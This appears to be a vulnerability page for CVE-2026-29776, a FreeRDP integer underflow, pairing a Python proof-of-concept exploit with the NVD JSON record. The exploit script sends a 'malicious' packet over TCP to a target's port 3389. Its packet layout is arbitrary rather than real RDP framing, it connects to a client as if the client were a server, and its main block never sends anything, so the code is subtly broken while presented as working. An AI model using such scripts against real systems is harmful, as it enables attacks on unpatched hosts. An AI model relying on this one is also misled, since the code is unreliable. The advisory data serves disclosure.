CVE-2026-29776

# CVE-2026-29776 PoC - FreeRDP Integer Underflow # This PoC demonstrates the integer underflow in update_read_cache_bitmap_order # Note: This is for educational purposes only import struct def create_malicious_rdp_packet(): """ Create a malicious RDP packet to trigger integer underflow """ # RDP Header packet_type = 0x02 # Update type for cache bitmap flags = 0x0000 # Malicious cache bitmap order header # Trigger integer underflow by setting size to 0 or very small value bitmap_order = struct.pack('<H', 0x0000) # Order type bitmap_order += struct.pack('<H', 0x0000) # Flags bitmap_order += struct.pack('<I', 0x00000000) # Size = 0 triggers underflow bitmap_order += struct.pack('<I', 0xFFFFFFFF) # Negative offset # Construct full RDP update packet rdp_header = struct.pack('<BBH', packet_type, flags, len(bitmap_order)) rdp_packet = rdp_header + bitmap_order return rdp_packet def send_malicious_packet(target_ip, port=3389): """ Send the malicious packet to target FreeRDP client """ import socket try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, port)) sock.send(create_malicious_rdp_packet()) print(f"Malicious packet sent to {target_ip}:{port}") sock.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": print("CVE-2026-29776 FreeRDP Integer Underflow PoC") print("Target: FreeRDP < 3.24.0") print("Usage: python poc.py <target_ip> [port]")

{"cve": {"id": "CVE-2026-29776", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:33.203", "lastModified": "2026-03-17T14:33:19.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, Integer Underflow in update_read_cache_bitmap_order Function of FreeRDP's Core Library This vulnerability is fixed in 3.24.0."}, {"lang": "es", "value": "FreeRDP es una implementación gratuita del Protocolo de Escritorio Remoto. Antes de 3.24.0, Desbordamiento negativo de enteros en la función update_read_cache_bitmap_order de la biblioteca central de FreeRDP. Esta vulnerabilidad se corrige en 3.24.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-191"}, {"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.24.0", "matchCriteriaId": "97FCA262-35C3-4B6B-A321-15CE780FCA20"}]}]}], "references": [{"url": "https://github.com/FreeRDP/FreeRDP/commit/a9e0abf2eac8c2e370fa155bf1abb9d044c0ca8a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-c747-x4wf-cqrr", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}